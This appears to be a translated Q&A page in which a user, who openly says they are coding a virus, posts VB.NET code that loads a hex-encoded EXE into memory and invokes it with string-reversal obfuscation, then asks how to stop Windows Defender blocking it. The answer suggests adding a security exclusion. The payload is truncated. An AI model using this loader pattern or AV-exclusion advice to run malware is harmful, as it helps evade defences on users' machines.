vb.net - 操作未成功完成,因为该文件包含病毒或可能不需要的软件。(来自 HRESULT 的异常:0x800700E1)
问题描述
伙计们,我在 Visual Studio 的 vb.net 中编码时遇到问题。这是我的代码,它将 .EXE 文件十六进制转换为字节并直接从内存中运行。
Imports System.Linq,System.Reflection
Public Module Module1
Public Sub Main()
Dim n As String = "4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00"
Dim q1 As Object = Assembly.Load(HexToByte(n))
Dim d2 As Object = CallByName(q1, "EntryPoint", CallType.Method)
Dim E3 As Object = CallByName(d2, StrReverse("ek" & "ovni"), CallType.Get, StrReverse("oN") & "th" & "ing", Nothing)
End Sub
Public Function HexToByte(ByVal str As String) As Byte()
Dim xData As Byte() = str.Split(" "c).Select(Function(n) Convert.ToByte(Convert.ToInt32(n, 16))).ToArray()
Return xData
End Function
End Module
当我使用 F5 键调试它时,它显示如下完整消息:
System.BadImageFormatException:
'Could not load file or assembly '32256 bytes loaded from Project1, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null' or one of its dependencies.
An attempt was made to load a program with an incorrect format.'
并且
Inner Exeception
BadImageFormatException: Operation did not complete successfully because the file contains a virus or potentially unwanted software.
(Exception from HRESULT: 0x800700E1)
伙计们,这些消息表明我正在编码病毒,这也是真的。
但是我已经多次使用此代码,但它没有返回任何异常。
但现在它不允许我。怎么修那个东西???
解决方案
我只是在 Windows 10 上执行一些代码时遇到了同样的问题golang
。事实证明,Windows 安全中心一直在将临时文件视为将C:\Users\<user-name>\AppData\Local\Temp\go-buildxxxxxxxxx\b00x\exe\app.exe
我的app.go
脚本作为病毒或可能不需要的软件运行。一种快速解决方法是通过扩展通过 Windows 安全添加排除,但我不确定这是否是最佳做法,因为这会削弱您的安全性。
请注意,上面的“x”代表我试图隐藏以保持通用性的数字。
推荐阅读
- ios - 如何在 macOS 上查看 lldb 中的别名定义?
- php - 动态生成的 mysqli 准备语句的特殊行为
- javascript - 如何在按钮单击时将值分配给数组
- r - dplyr 通过多列的不同函数汇总(折叠)数据集
- python - 为什么我得到“未定义的变量”?
- python - 如何在带有 Sublime 3 的 python 3 中使用“打印”彩色输出
- python - import-im6.q16: 未授权“boto3”@error/constitute.c/WriteImage/1037
- reactjs - 即使我有 _isMounted 检查,AuthScreen 组件也会在卸载警告上引发更新
- android - 当多个包注册到同一个广播接收器时会发生什么?
- session - Laravel 6.0 写入会话时出错 ias 无法在 Windows 中打开文件流